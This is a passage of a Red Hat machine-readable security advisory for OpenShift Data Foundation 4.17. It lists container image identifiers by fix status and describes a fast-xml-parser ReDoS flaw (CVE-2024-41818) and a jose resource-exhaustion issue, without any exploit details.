"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "jose: resource exhaustion"
},
{
"cve": "CVE-2024-41818",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2024-07-29T16:24:42+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2300499"
}
],
"notes": [
{
"category": "description",
"text": "A regular expression denial of service (ReDoS) flaw was found in fast-xml-parser in the currency.js script. By sending a specially crafted regex input, a remote attacker could cause a denial of service condition.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "fast-xml-parser: ReDOS at currency parsing in currency.js",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Red Hat has decided to rate this vulnerability as Important due to the potential loss of Availability and the low complexity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x"
],
"known_not_affected": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
